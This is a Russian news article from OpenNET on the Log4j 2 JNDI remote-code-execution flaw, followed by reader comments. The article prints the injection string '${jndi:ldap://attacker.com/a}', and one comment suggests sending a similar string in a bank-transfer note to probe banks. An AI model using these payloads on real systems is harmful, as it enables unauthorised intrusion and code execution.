The OpenNET Project / Index page

[ новости /+++ | форум | wiki | теги | ]

Критическая уязвимость в Apache Log4j 2, затрагивающая многие Java-проекты

10.12.2021 09:07

В Apache Log4j 2, популярном фреймворке для организации ведения логов в Java-приложениях, выявлена критическая уязвимость, позволяющая выполнить произвольный код при записи в лог специально оформленного значения в формате "{jndi:URL}". Атака может быть проведена на Java-приложения, записывающие в лог значения, полученные из внешних источников, например, при выводе проблемных значений в сообщениях об ошибках.

Отмечается, что проблеме подвержены почти все проекты, использующие такие фреймворки, как Apache Struts, Apache Solr, Apache Druid или Apache Flink, включая Steam, Apple iCloud, клиенты и серверы игры Minecraft. Ожидается, что уязвимость может привести к волне массовых атак на корпоративные приложения, повторив историю критических уязвимостей во фреймворке Apache Struts, который по приблизительной оценке применяется в web-приложениях 65% компаний из списка Fortune 100. В том числе уже зафиксированы попытки сканирования сети на предмет уязвимых систем.

Проблема усугубляется тем, что уже опубликован рабочий эксплоит, но исправления для стабильных веток на данный момент не сформированы. СVE-идентификатор пока не присвоен. Исправление включено только в тестовую ветку log4j-2.15.0-rc1. В качестве обходного пути блокирования уязвимости рекомендуется выставить параметр Log4j2.formatMsgNoLookups в значение true.

Проблема была вызвана тем, что Log4j 2 поддерживает обработку специальных масок "{}" в выводимых в лог строках, в которых могли выполняться запросы JNDI (Java Naming and Directory Interface). Атака сводится к передаче строки с подстановкой "${jndi:ldap://attacker.com/a}", при обработке которой Log4j 2 отправит на сервер attacker.com LDAP-запрос пути к Java-классу. Возвращённый сервером атакующего путь (например, http://second-stage.attacker.com/Exploit.class) будет загружен и выполнен в контексте текущего процесса, что позволяет атакующему добиться выполнения произвольного кода в системе с правами текущего приложения.

Дополнение 1: Уязвимости присвоен идентификатор CVE-2021-44228.

Дополнение 2: Выявлен способ обхода защиты, добавленной выпуск log4j-2.15.0-rc1. Предложено новое обновление log4j-2.15.0-rc2 с более полной защитой от уязвимости. В коде выделяется изменение, связанное с отсутствием аварийного завершения в случае использования некорректно оформленного JNDI URL.

Дополнение 3: Компания Cloudflare зафиксировала проведение массовых автоматизированных атак для захвата управления над системами, использующими уязвимую библиотеку Log4j 2.

Дополнение 4: Компания Cybereason предложила проактивный метод борьбы с уязвимостью и опубликовала эксплоит-вакцину Logout4Shell, который через совершение атаки выставляет Java-настройки "log4j2.formatMsgNoLookups = true", "com.sun.jndi.rmi.object.trustURLCodebase = false" и "com.sun.jndi.cosnaming.object.trustURLCodebase = false" для блокирования дальнейшего проявления уязвимости на неподконтрольных системах.

Дополнение 5: Уязвимость в том числе затронула продукты GitHub, включая GitHub.com, GitHub Enterprise Cloud и GitHub Enterprise Server.

Дополнение 6: Активность атакующих существенно возросла и уязвимость активно эксплуатируется. Например, компания Check Point зафиксировала на своих подставных серверах в пике около 100 попыток эксплуатации в минуту, а компания Sophos сообщила о выявлении нового ботнета для майнинга криптовалюты, сформированного из систем с неисправленной уязвимостью в Log4j 2.

Дополнение 7: Фонд Apache опубликовал список своих проектов, которые затрагивает уязвимость в Log4j. Проблеме подвержены: Apache Archiva, Druid, EventMesh, Flink, Fortress, Geode, Hive, JMeter, JSPWiki, OFBiz, Ozone, SkyWalking, Solr, Struts, TrafficControl и Calcite Avatica.

Дополнение 8: Выявлен новый вектор атаки, позволяющий обойти добавленную защиту.

Дополнение 9: Найдена ещё одна опасная уязвимость в Log4j 2, а также способ атаки через web-браузер на локальные Java-приложения, не принимающие внешние сетевые запросы. Около 8% пакетов в репозитории Maven подвержены уязвимости в Log4j 2 через зависимости, исправления пока внесены только в 13% из этих пакетов.

Дополнение 10: Агентство по кибербезопасности и защите инфраструктуры США опубликовало список продуктов, в которых подтверждено проявление уязвимости.

  1. Главная ссылка к новости (https://www.lunasec.io/docs/bl...)
  2. OpenNews: Ещё одна уязвимость в Apache httpd, позволяющая обратиться за пределы корневого каталога сайта
  3. OpenNews: Критическая уязвимость в Apache Struts
  4. OpenNews: Вредоносное ПО, поражающее NetBeans для внедрения бэкдоров в собираемые проекты
  5. OpenNews: Уязвимость в Apache Struts стала причиной утечки персональных данных 143 млн американцев
  6. OpenNews: Уязвимость в Apache CouchDB, позволяющая совершить атаку на реестр пакетов NPM
Лицензия: CC-BY
Тип: Интересно / Проблемы безопасности
Короткая ссылка: https://opennet.ru/56319-log4j
Ключевые слова: log4j, vulnerability
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (150) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, Аноним (1), 09:23, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • –11 +/
    «катастрофическая», лол
     
     
  • 2.4, Аноним (4), 09:30, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +28 +/
    Ну учитывая где используется Java и как там дела с обновлениями, то действительно все печально
     
  • 2.20, Аноним (20), 10:06, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +6 +/
    Не так давно пол-США сидели без бензина и мяса когда ломанули оператора трубопроводной сети и оператора сети мясокомбинатов. А на яве написано допупа бизнес-логики.
     
  • 2.46, Аноним (-), 11:10, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Для того чтобы понять почему катастрофическая запусти у себя netcat на порту 389, отправь на карту или счёт в другом банке любой перевод с  ${jndi:ldap://твой_IP/test} в комментарии и насладись сколько вего разного к тебе полезет :-)
     
     
  • 3.54, Онаним (?), 11:39, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +8 +/
    Главное чтобы маски-шоу из категории разного в дверь и окна не полезли.
     
  • 3.55, Онаним (?), 11:40, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Поэтому лучше IP конечно не свой :)
     
     
  • 4.84, Аноним (84), 13:19, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    И с чужого банковского счёта перевод делать, ага
     
  • 3.60, Аноним (60), 11:53, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    В банках доступ в интернет, да даже в соседний vlan закрыт. Так что ищите где-то еще.
     
     
  • 4.68, Аноним (68), 12:28, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +2 +/
    И как вы online-банком если всё закрыто пользуйтесь? Только не говорите, что там исходящие соединения блокируются, это у единиц.
     
     
  • 5.137, пох. (?), 08:54, 11/12/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Да нет, дол-еов тыщи же ж Вспоминая один из самых круто-обинтернетившихся в пер... большой текст свёрнут, показать
     
     
  • 6.175, Аноним (175), 02:13, 27/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Чё за поток сознания лол, иди таблеточки пропей
     

  • 1.2, Антонио (??), 09:28, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +13 +/
    Переполнение буфера, говорили они. Безопасность, говорили они. Позор и срамота.
     
     
  • 2.9, btrfs (?), 09:43, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +6 +/
    Простите за моё невежество, но как связаны реализация в языке и нечто криво реализованное на этом языке?
     
     
  • 3.11, Аноним (11), 09:49, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +30 +/
    Есть свидетели того, которые утверждают, что если убрать риски работы с памятью, то всё само наладится, и даже кости выпрямятся.
     
     
  • 4.39, Аноним (39), 10:47, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Простите, но Вы звиздите. Никто из них не утверждал, что прям "всё само наладится". Исчезнут (почти) целые классы ошибок, коих большинство (70-80%), но логические ошибки в архитектуре системы или в реализации бизнес-логики никто не отменял - от прокладки зависит. Но Вы, конечно, припИшете оппонентам и поедание младенцев, хуже не будет, верно?
     
  • 4.43, Онаним (?), 10:54, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +5 +/
    Там даже обратный эффект, я бы сказал - понижается vulnerability awareness, со всеми вытекающими.
     
  • 3.69, Michael Shigorin (ok), 12:30, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • –3 +/
    > как связаны реализация в языке и нечто криво реализованное на этом языке?

    Надежда на серебрянопульность инструмента склонна отключать рассудок с весьма печальными последствиями.  Варианты могут быть самыми разными -- от "возьмём язык с автоматическим управлением памятью" до "попрыгаем на площади и покричим" или классического "построим соломенный самолёт", что характерно.

     
     
  • 4.114, ыы (?), 16:40, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Любите вы Миша обобщать, и делать выводы космического масштаба.. а сами все лето в свитере проходили...
     
     
  • 5.123, n00by (ok), 17:47, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Эту пулю ещё Фредерик Брукс в 1986-м обобщил.
     
     
  • 6.124, Аноним (124), 18:06, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Им читать некогде - видеокурсы же есть
     
  • 2.92, Аноним (84), 13:31, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +10 +/
    Раньше надо было срывать стек, писать шелл-код на ассемблере, не ошибиться с адресами на удалённой машине. А теперь процесс-жертва услужливо подтянет Java байт-код атакующего прямо из Интернета и аккуратно вставит в себя, не нарушив целостность стека и процесса, автоматически проинициализирует твой код, будет за ним мусор собирать. Красота! :)
     
     
  • 3.115, ыы (?), 16:42, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    О дивный новый мир!
     
  • 3.118, Онаним (?), 16:55, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Можно даже от смузи не отрываться, да, я тоже оценил.
     
  • 3.120, n00by (ok), 17:13, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Раньше мистеры Буггерс и Хуккерс предупреждали, что все умеют компелировать сплоет, а над ними смеялись.
     
  • 3.171, Аноним (171), 22:20, 13/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    А ведь скоро придет время, когда они додумаются прикрутить продвинутый искусственный интеллект к очередной помойке для логов, и тогда пелевинские "зенитные кодексы" из фантастики превратяться в когнитивно диссонирующую реальность.
    Истинно говорю вам! Так что покайтесь, пока еще не поздно...
     

  • 1.3, Аноним (3), 09:30, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • –6 +/
    ага, спасибо. прямо вот только что проснулся и побежал патчить свои Apple iCloud - сервера
     
  • 1.8, лютый жабби__ (?), 09:43, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • –3 +/
    бред какой-то... даже если торчит майнкрафт голой ж в инет, ну запишите в логгер произвольный текст, я посмотрю на ваши успехи )

    "Надо срочно переписать на ржаву"

    твои мозги )

     
     
  • 2.10, Аноним (4), 09:45, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    А то что почти все банки на Java? При чем там лютый legacy
     
     
  • 3.19, лютый жабби__ (?), 10:04, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    >При чем там лютый legacy

    ты неправ. слышал, что у немцев можно 6-ку встретить, но в рф 8-11 уже почти везде. у всяких тупкофф-кредитно-пельменные-системы 17 + коклины, скалы, го и прочая смузибень ) уж версию log4j бампнуть не проблема.... хотя для типичного
    e.printStackTrace();
    данная "уязвимость" имхо неуязвима

     
     
  • 4.37, Онаним (?), 10:43, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +7 +/
    Там легаси проприетарь, которая возможно уже местами просто не поддерживается, но сертифицировать новую версию ДОРОГО(tm). И бампнуть там ничего не получится либо потому что все версии библиотек тоже прибиты гвоздями по сертификации, либо потому, что API сменилось 100500 лет назад тому, и говно мамонта просто развалится.
     
     
  • 5.77, лютый жабби__ (?), 12:59, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • –3 +/
    >Там легаси проприетарь, которая возможно уже местами просто не поддерживается, но сертифицировать новую версию ДОРОГО

    в УдмуртСельхозБанке разве только... )

     
  • 3.34, йо (?), 10:38, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Неправда, некоторые банки ещё на COBOL, и планируют перейти на модно-молодёжную Java.
     
  • 3.91, OramahMaalhur (ok), 13:30, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +2 +/
    log4j2 != log4j

    Лютое легаси - это про log4j. Если притащили log4j2 , значит, сравнительно недавно (по меркам легаси) разрабатывали.

     
  • 2.27, BratishkaErik (ok), 10:29, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +4 +/
    Написал в чате > записало в логи > взлом

    Проголосовал на мониторинге с NuVotifier > записало в логи > взлом

     
     
  • 3.116, ыы (?), 16:44, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    >Написал в чате > записало в логи > взлом

    Вот и состав преступления...

     

  • 1.13, пох. (?), 09:51, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Но как же ж так? Ведь жаба же ж - безопастная?!

     
     
  • 2.18, Аноним12345 (?), 10:01, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Ни разу не безопасная
     
     
  • 3.42, Аноним (42), 10:52, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Шо, и указатели можно?
     
     
  • 4.56, aa (?), 11:43, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +3 +/
    учитывая что любой объект в джаве - это указатель, то в джаве указатели не просто можно , а прям необходимо.
    вот арифметики указателей нету, поэтому обратиться куда-то по левому адресу сложно.
     
  • 4.66, лютый жабби__ (?), 12:14, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +2 +/
    >указатели можно?

    можно конечно, смотря что. а ещё можно утечки памяти нагомнокодить, которые GC не сможет разгрести.

     
     
  • 5.129, barracuda92 (ok), 21:49, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    у нас индусы написали автотесты в которых была статичная мапа в который все контексты валялись, все хедлесс браузеры, всё-всё в общем, при выделении 8 гб на тесты они падали с аут оф мемори))
     
     
  • 6.140, лютый жабби__ (?), 11:49, 11/12/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    >при выделении 8 гб на тесты они падали с аут оф мемори

    дедики с 64ГБ стоят 3 тыра в месяц. я б не работал в такой помойке, где раму жмотят )

    а вчерашний студент после  курсов стоит 150+ тыр (плюсом налоги)

     
  • 4.167, Наме (?), 11:45, 13/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Жаба саморефлексаная и полностью динамическая. Так что, можно, в общем-то, всё. Правда, пальцы сотрутся и глаза коростой покроются.
     
  • 2.32, Котофалк (?), 10:35, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Скилл написать небезопасно на каком угодно языке позволяет это преодолеть. И не только это. Тут как нельзя кстати набор поговорок про сломать сдуру, про стеклянный до обеда и иже с ними.
     
  • 2.36, йо (?), 10:41, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +3 +/
    Это не Ява, это log4j.
     
     
  • 3.38, Онаним (?), 10:47, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Который к сожалению в рот тащит каждый третий проект из двух.
     
  • 2.45, Аноним (39), 11:01, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Ну возьми самый безопасный язык (у тебя, как я смею предположить, основываясь на твоем творчество на опеннете, это сиплюсплюс со всякими модными  (условно) "умными указателями" и правильными техниками написания кода настоящими программистами?) и напиши на нем безусловную загрузку извне любой произвольной блобятины и ее последующий запуск и потом ори - "язык небезопасный, мне вирусятину тиснул!". А если каким-то чудом язык мог бы запретить такое делать, орал бы "что за 1С мне навязывают, на этом гогне ничего нетривиального нельзя сделать!"
     
     
  • 3.121, n00by (ok), 17:22, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    > Ну возьми ...
    > и напиши на нем безусловную загрузку извне любой произвольной блобятины
    > ее последующий запуск

    Изучите тему и не пишите подобное. Задача не решается в общем виде.

     

  • 1.16, d (??), 10:00, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +3 +/
    Давайте все усложним, что бы потом все упростить сложными путями.
     
     
  • 2.74, Michael Shigorin (ok), 12:37, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    [CODE]ls /[/CODE]!
     
  • 2.133, Аноним (133), 22:32, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Есть мнение, что для отдельно взятой задачи сложность постоянна. Вопрос лишь в том, где она сконцентирирована - в твоём коде или в сторонних компонентах.
     

  • 1.17, Аноним12345 (?), 10:00, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    >> Возвращённый сервером атакующего путь будет загружен и выполнен в контексте текущего процесса, что позволяет атакующему добиться выполнения произвольного кода в системе с правами текущего приложения.

    Это действительно катастрофа
    С системой можно делать все что угодно
    Жаба, господа, та самая проприетарная жаба

     
     
  • 2.125, Bogdan (??), 18:29, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Она как бы опенсорс, господин. Ну и причем тут язык и платформа, если дело в либе, уже давно log4j - это легаси, то что некоторым лень уменьшит тех. долг - не проблема платформы
     

  • 1.21, Аноним (21), 10:09, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    Да весь код на яве такой дырявый. Чтобы передать стрингу или простейший boolean сразу используют RPC с уродским RMI
     
     
  • 2.126, Bogdan (??), 18:31, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Где вы такое последний раз видели ? И звучит странно "Что бы пкередать стрингу...." - в коком это контексте ? Куда передать ? RPC - это как бы не java-вая фигня
     

  • 1.22, BratishkaErik (ok), 10:09, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    Ох, я не успел сделать новость... А вообще это круто — пусть люди поскорее узнают новость
     
  • 1.24, Аноним (24), 10:11, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +4 +/
    Jndi для лога это точно нужная фича которая должна быть включена у всех по умолчанию? Может быть нафиг её?
    И вообще сетевые запросы отправлять в логе не выглядит безопасно.
     
     
  • 2.44, Онаним (?), 10:57, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +8 +/
    Бездумный eval (а это по сути своей eval) в генерируемом обычно с использованием пользовательского ввода логе - это особый уровень пох**зма, который, надо сказать, очень сложно будет переплюнуть.
     
     
  • 3.59, aa (?), 11:52, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Выполнять логи - это конечно крипота та еще, но, я так понимаю, это ради производительности - если передавать уже готовое значение в логи, то его надо обязательно вычислить перед этим (а значит обратиться к этому лдапу, что-то передать, потом распарсить ответ итд), а логгер после этого может просто выбросить это значение, потому что уровень логгирования не тот.
     
     
  • 4.93, OramahMaalhur (ok), 13:35, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    >а логгер после этого может просто выбросить это значение, потому что уровень логгирования не тот

    logger.isInfoEnabled()

     
     
  • 5.146, а (?), 15:26, 11/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    если всё руками делать, то можно и на С писать.
    а тут можно просто сказать логгеру - "если что запиши значение вон оттудава", ничего не проверяя и не вычисляя
    Л - удобство
     
  • 4.158, Аноним (158), 05:21, 13/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    При необходимости передавать в логгер помимо строки раннер для нужных запросов (попросту колбэк), который максимум вернёт мап с параметрами, которые нужно в плейсхолдеры подставить. Тогда логгер сможет сам решить — нужно ему этот раннер дёргать или нет.
     
     
  • 5.173, Онаним (?), 07:18, 14/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Как вариант. В PHP легко closure передать. В жабе не в курсе, далёк от.
     

  • 1.28, Аноним (28), 10:29, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    log4net в безопасности?
     
  • 1.29, пох. (?), 10:31, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    Кстати,поищите у себя в логах appdynamics. Эксплуатируемо или нет - не знаю, но им пользуется половина так называемого цивилизованного мира. Да, оно работает от рута.

    Да, конечно же там log4j, где ж его теперь нет.

     
  • 1.30, Аноним (30), 10:31, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    У меня вчера stream play на стиме сам без особой причины запустился. И начал двигать мышью и открыл виртуальную клаву Steam. у меня есть основания полагать что уже активно юзают это чудо.
     
  • 1.31, DEF (?), 10:35, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Блин. Мои хелловорлды юзают log4j2. Ждем фиксов!
     
  • 1.35, Онаним (?), 10:40, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +4 +/
    >  "${jndi:ldap://attacker.com/a}", при обработке которой log4j отправит на сервер attacker.com LDAP-запрос пути к Java-классу

    Макаки конечно везде одинаковые, да...
    Это ж надо такую срань в систему логгирования воткнуть.
    А вот просто ${var} и передачу var отдельно - ну никак было.

     
  • 1.40, Аноним (-), 10:49, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    По непроверенным данным дыра проявляется в госуслугах и вёбинтерфейсах кучи крупных банков. Лично перепроверить не решился, так как за такую проверку и посадить могут.
     
     
  • 2.47, пох. (?), 11:15, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +2 +/
    > По непроверенным данным дыра проявляется в госуслугах и вёбинтерфейсах кучи крупных банков.

    appdynamics, да.

    Страховые из первой десятки туда же.

    > Лично перепроверить не решился, так как за такую проверку и посадить могут.

    так ты американские "проверяй". Там апдырявикс такой же точно стоит. И в банках, и в страховых, и вообще в любых околофинансовых пира...ой, организациях.
    Что ты с таким умением и талантом забыл на г0вуслугах?

     
     
  • 3.142, Аноня (?), 12:34, 11/12/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > так ты американские "проверяй"

    А потом пожизненно прячься от выдачи в родных говеньях

     
  • 2.141, Аноня (?), 12:28, 11/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Сбеги в Бриташку и оттуда проверяй.
     
  • 2.157, Аноним (158), 05:05, 13/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Даже в Amazon S3 проявляется
     

  • 1.41, Аноним (42), 10:51, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • –3 +/
    Типа безопасные языки. Надо было писать на Rust :)
     
     
  • 2.49, пох. (?), 11:16, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +3 +/
    > Типа безопасные языки. Надо было писать на Rust :)

    как, в нем нет eval?! Нельзя загрузить в процесс какой-нибудь неожиданный код из интересного источника? А если unsafe{} вокруг написать?

     
     
  • 3.82, morphe (?), 13:16, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    eval нет, а используемые большинством библиотеки для логгирования в ldap не стучат)
    Да и не выйдет там так просто подобное сделать, инфраструктура форматирования там встроена в язык, а не реализуется всеми подряд, + для всяких сущностей есть вещи удобнее чем коды форматирования
     
     
  • 4.87, пох. (?), 13:21, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +2 +/
    > eval нет, а используемые большинством библиотеки для логгирования в ldap не стучат)

    тысячигласс проверял, зуб дает? А то большинство из нас полагаю о такой нужной и полезной фиче в log4j тоже до сегодняшнего дня имели щастье не знать.

    > Да и не выйдет там так просто подобное сделать, инфраструктура форматирования там
    > встроена в язык, а не реализуется всеми подряд, + для всяких

    так там все правильно форматируется, встроенными в язык средствами. Правильная получается строка для правильного обращения к ldap, не какой-нибудь вам off by one error или обращение в левую память. Кто бы мог подумать да и было ли ему чем, что в логах могут попадаться абсолютно любые строки?

     
     
  • 5.99, morphe (?), 14:41, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +2 +/
    А в Rust даже нет смысла подобное делать Зачем в жаве чтение из ldap пихнули в с... большой текст свёрнут, показать
     
     
  • 6.101, пох. (?), 15:09, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    весь прикол в том что оно вовсе не "userid" получало.
    Оно получало КОД который исполняясь возвращал возможно вовсе не userid а результат общения в чате с этим пользователем техподдержки, ну, например. Ну почему бы и нет.

    Если бы оно получало статические данные из ldap - никому бы никакого вреда от этого не было. В лог, недоступный извне, можно записать какие-то данные - доступные извне. Ну и что.

    Как именно в хрусте можно вызвать КОД по ссылке на блок данных полученных хз откуда - это к знатокам хруста.

     
     
  • 7.155, morphe (?), 22:11, 12/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Я привёл пример того, как эту фичу задумывалось использовать, эксплуатация выгля... большой текст свёрнут, показать
     
  • 6.108, Аноним (108), 15:29, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Так и на яве можно сделать то же самое. И вообще как уже сказали суть уязвимости не в этом.
     
  • 5.164, Наме (?), 11:10, 13/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Нефига не правильно. В ответ на JNDI-запрос исполняющий код не должен грузить классы. Это уж совсем трэшак. Очередное пюре в духе "а ведь было бы не плохо, чтобы кофеварка ещё и траву косила".
     
  • 2.50, Аноним (39), 11:26, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Ага, язык, на котором ты напишешь систему управления атомным реактором, должен будет бить тебя по рукам, когда ты в неправильной последовательности кнопки в программе будешь нажимать. А также язык, а не математик/архитектор/программист, посредством заложенных алгоритмов, должен будет следить чтобы в космической ракете ориентация правильно вычислялась. Ну и язык конечно же, а не проектировщик системы при создании, должен следить, чтобы в будущем "умном" доильном аппарате корове сиську не оторвало. Как же вы, мелкие моськи, недалёки...
     
     
  • 3.90, пох. (?), 13:30, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Конечно, язык Сейчас так модно разрабатывать - ядерные реакторы, ракеты особе... большой текст свёрнут, показать
     
     
  • 4.103, Аноним (39), 15:12, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    > Конечно, язык!

    Пох, как всегда, передергиваешь. Язык не должен знать в какой последовательности у коровы соски дергать, в компиляторе или рантайме не должно быть абстракций про коровье вымя, они должны быть  только в голове у проектировщика. То же и про самописную (по отношению к языку) систему логгирования. Мог бы быть наполовину прав, если бы эта система была частью языкового рантайма/системной библиотеки.

     
     
  • 5.105, пох. (?), 15:16, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • –2 +/
    >> Конечно, язык!
    > Пох, как всегда, передергиваешь. Язык не должен знать в какой последовательности у
    > коровы соски дергать, в компиляторе или рантайме не должно быть абстракций
    > про коровье вымя, они должны быть  только в голове у
    > проектировщика. То же и про самописную (по отношению к языку) систему
    > логгирования. Мог бы быть наполовину прав, если бы эта система была
    > частью языкового рантайма/системной библиотеки.

    да-да, во всем виноват, помнити его - автор leftpad. Взял и сломал нам весь интернет. А не угребищный язык на котором логгер (или выравнивание пробелом) надо разрабатывать силами апач фаундейшн десять лет, иначе хрен запишешь строку в файл.

     
     
  • 6.149, Онаним (?), 19:42, 11/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Да тут не в языке дело.
    Тут чтобы палку-копалку выстругать - изобрели бензопилу, и попытались с её помощью палку заточить.
     
  • 6.150, Онаним (?), 19:42, 11/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Это где-то около надувания щёк - посмотрите, как мы можем.
    Не зря же есть хорошая фраза из математической старины: "упрощать - сложнее всего".
     
  • 4.143, john_erohin (?), 13:10, 11/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    > все, абсолютно все приходилось изобретать с нуля

    да ладно. это фон Браун с камрадами изобретали с нуля.
    потом они в качестве трофеев достались. кому-то сам фон Браун,
    а кому-то его камрады. железо и документы 50/50.

     
     
  • 5.144, пох. (?), 13:32, 11/12/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > да ладно. это фон Браун с камрадами изобретали с нуля.

    ну так камрады и изобретали. Тов.Королев и другие ответственные товарищи - руководил.

    Такого чтоб на старте рвануть даже еще до старта - себе не позволяли, инциденты на стендах и то были единичны и красной вехой в истори...в задницу впороты. Времена суровые были, партайгеноссе могли и в лагерь отправить, не умеешь проектировать с первого раза правильно - будешь напильником точить что другие напроектируют, а товарищи так и вовсе шлепнуть германского шпиена всегда готовы.

    Ну и ресурсы надрывающейся промышленности берегли, конечно. А камрадов всегда можно новых нарожать.

     
  • 4.151, Михрютка (ok), 00:24, 12/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    будет врать-то.

    союз на старте взрывался. протон на старте взрывался раз пять, не меньше.

    как взрывалось на старте изделие 11А52, так это вообще словами не передать. Мишин после этого, говорят, год от Бармина прятался, тот ему пообещал за разнесенный фклочья стартовый комплекс морду набить.

    янгелевские ракеты на испытаниях и на старте горели и в шахты падали.

    >>>никто на самом деле не предвидел <...> такую безобразную аварию

    не "не предвидел", а вывезли на старт недоработанную ракету. успеть к празднику торопились. "Результат немного предсказуем"

     
     
  • 5.153, n00by (ok), 12:38, 12/12/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > не "не предвидел", а вывезли на старт недоработанную ракету. успеть к празднику
    > торопились. "Результат немного предсказуем"

    Приплетаю тот самый Линдукс. Тоже ведь торопились к праздничку. Интересно, где оно бабахнет?

     
  • 5.160, пох. (?), 08:35, 13/12/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    А Маску - похрен, у него еще есть Бесконечные же ж был бы он предсказуем - ... большой текст свёрнут, показать
     
     
  • 6.168, Михрютка (ok), 16:51, 13/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    вы что, знакомы с вопросом исключительно по пересказам товарища рабиновича успе... большой текст свёрнут, показать
     
     
  • 7.170, пох. (?), 17:39, 13/12/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Я знаком по пересказам людей, работавших в отрасли.

    А вот у тебя очень похоже на напевы рабиновича, даже близко не бывавшего.

     
     
  • 8.172, Михрютка (ok), 01:19, 14/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
